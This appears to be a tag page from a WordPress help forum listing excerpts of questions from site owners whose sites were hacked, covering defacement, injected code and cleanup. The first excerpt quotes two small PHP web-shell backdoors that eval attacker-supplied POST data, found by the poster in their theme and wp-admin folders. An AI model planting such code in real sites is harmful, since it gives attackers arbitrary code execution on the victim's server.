Articles of hacked

Suspicious Files

Hi I found two suspicious files on my site: The first in my theme (404.php), with this line added <?php if ($_POST[“php”]){eval(base64_decode($_POST[“php”]));exit;} ?> The second in /wp-admin/ called wp-class.php. The only line there was: <?eval($_POST[joao]);?> Can anyone tell me what are this doing, and what steps should I take ?

Hack-Proof OR Security in WordPress — is it real?

For many years I’ve been using WordPress as a platform for websites, it is convenient to me as a developer and for customers. But recent months, several sites of my clients were hacked and I’m concerned about this problem. If you do not consider the option of password brootforcing, how hackers can get access to […]

Websites defaced by uploading script using theme editor

We’ve had several WordPress sites defaced, all of them having the same pattern (at least the raw access log says so). From the logs it appears they directly login to WordPress then go to theme editor > edit the 404.php file with a malicious code, they now run the code to deface the site. Here […]

If a WP install is hacked, can it spread to other domains on a server?

I have a managed server with several WP and non-WP sites, and code has been prepended to the content of all files (for all domains on the sever) which begin with a php command. I’m wondering whether the cause was a vulnerability or password-guess in one WP install, or instead a guess of the ftp […]

How was my WP site hacked

My site, http://www.cancer-study.com, has been hacked, and I can’t login to wp-admin. Can you say how it has been hacked and what can I do to undo the damage? I have access to the host.

hSite has no css on mobile

Our WP site got hacked and we’ve been working with our hosting to clean all malware etc. However, now the site appears on desktop fine, but on mobile it looks as though all the css is stripped. Here’s the site: http://italiancottage.pleaseproof.com/

Change WP-Login or WP-Admin

Can I change the name of the wp-login or wp-admin file so that I can go to a different filename in order to login. I am trying to prevent hackers from finding my login and wp-login has become a very obvious option.

Hacked WordPress website, as notified by Google Search Console, what to do?

I just received a second email from Google Search Console, that one of my websites, Emma&Nala Jewelry was hacked. In the email, they have sent two URL’s that they found to be “suspicious”: http://emmaandnala.com/jlyesvgliktwgsg-b899-n26339-gslk/ http://emmaandnala.com/n34104-kfkou-b890-xxptoayz/ The website config stats: Linux Hosting at Avalon hosting, Business package WordPress 4.8, updated before this posting Plugins: Akismet v3.3.3 […]

How do i disable/disallow <script> and <iframe> tags in TinyMCE?

A client of mine has just had 200 posts injected by malicious scripts and iframes. The website is now all cleared. They were put in the content by the user updating the post/page as my clients computer was infected. (Though only in the TinyMCE editor – not any of the other custom fields assigned to […]

What should I do about hacked server?

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked. Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix). It doesn’t seem to affect the rendered […]